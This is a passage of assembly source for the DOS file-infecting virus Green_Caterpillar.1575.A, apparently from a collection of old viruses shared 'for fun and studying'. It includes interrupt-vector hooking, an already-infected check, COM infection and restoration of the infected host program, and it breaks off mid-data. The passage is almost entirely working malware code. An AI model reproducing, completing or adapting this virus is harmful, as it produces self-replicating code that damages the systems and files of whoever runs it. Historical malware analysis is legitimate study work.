gc1575a.asm

More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use

; Green_Caterpillar.1575.A
; TASM /M 


seg000		segment	byte public 'CODE'
		assume cs:seg000
		org 100h
		assume es:nothing, ss:nothing, ds:seg000

start		proc near
		jmp	short RealStart
		db 90h
Int21Ofs	dw 0
Int21Seg	dw 0
Int1COfs	dw 0
Int1CSeg	dw 0
exeHeader	dw 20CDh
exeMOD		dw 9090h
exeDIV		dw 0
exeNumSeg	dw 0
exeHeadSize	dw 0
exeMinPara	dw 0
exeMaxPara	dw 0
exeSS		dw 0
exeSP		dw 0
exeCheckSum	dw 0
exeIP		dw 0
exeCS		dw 0
StartCS		dw 0
StartIP		dw 0
FileSizeHW	dw 0
FileSizeLW	dw 0
StoreSS		dw 0
DTAOffset	dw 0
DTASegment	dw 0
StartSS		dw 0
StoreBP		dw 0
StoreES		dw 0
Int24Seg	dw 0
Int24Ofs	dw 0
GenCounter	db 16
byte_0_13C	db 7, 57h, 75h,	2, 5Ch,	7, 70h,	0, 16h,	0, 0BFh, 0Bh, 5Ch, 7, 70h, 0

RealStart:
		push	es
		push	ds
		mov	ax, es
		push	cs
		pop	ds		; DS = CS
		push	cs
		pop	es		; ES = CS
		assume es:seg000
		mov	StoreES, ax
		mov	ax, ss
		mov	StoreSS, ax
		mov	al, 2
		out	20h, al		; Interrupt controller,	8259A.
		cld	
		xor	ax, ax
		mov	ds, ax		; DS points to IVT
		assume ds:nothing
		xor	si, si
		mov	di, 13Ch
		mov	cx, 16
		repne movsb
		push	ds
		pop	ss		; SS = DS
		assume ss:nothing
		mov	bp, 8
		xchg	bp, sp
		call	near ptr sub_0_1C5
		jmp	StoreFilename
start		endp

FixupInts:
		call	GetInt24Vecs
		call	CheckInfection
		jz	AlreadyInf	; Infected Already? Then JMP.
		mov	al, ds:FileType
		push	ax
		call	InfectCOM
		pop	ax
		mov	ds:FileType, al
		jmp	short RestoreFile
		nop	

AlreadyInf:
		call	GetIntVectors
		call	CheckForInstall
		cmp	ds:FileType, 0	; No File Type?
		jnz	RestoreFile	; No? Then JMP.
		mov	ax, 4C00h
		int	21h		; Exit To DOS

RestoreFile:				; COM File?
		cmp	ds:FileType, 'C'
		jnz	RestoreEXE	; No? Then JMP.

RestoreCOM:
		pop	ds
		assume ds:seg000
		pop	es
		assume es:nothing
		push	cs
		pop	ds		; DS = CS
		pop	es
		push	es
		mov	di, offset start
		mov	si, offset exeHeader
		mov	cx, 12
		repne movsb		; Restore Original 12 Bytes
		push	es
		pop	ds		; DS = ES
		mov	ax, offset start
		push	ax
		xor	ax, ax
		retf			; Return to Original COM Program

sub_0_1C5	proc far
		mov	si, 6
		lodsw
		cmp	ax, 192h
		jz	RestoreCOM
		cmp	ax, 179h
		jnz	loc_0_1D6
		jmp	loc_0_27F

loc_0_1D6:
		cmp	ax, 1DCh
		jz	RestoreEXE
		retn	

RestoreEXE:
		pop	ds
		pop	es
		mov	bx, cs:exeSS
		sub	bx, cs:StartSS
		mov	ax, cs
		sub	ax, bx
		mov	ss, ax
		assume ss:nothing
		mov	bp, cs:StoreBP
		xchg	bp, sp
		mov	bx, cs:exeCS
		sub	bx, cs:StartCS
		mov	ax, cs
		sub	ax, bx
		push	ax
		mov	ax, cs:StartIP
		push	ax
		retf	
sub_0_1C5	endp

Caterpillar	db '#'
		db 1Ah
		db '<'
		db '#'
		db '/'
		db '-'
		db '-'
		db '!'
		db '.'
		db '$'
		db 0Eh
		db '#'
		db '/'
		db '-'
		db '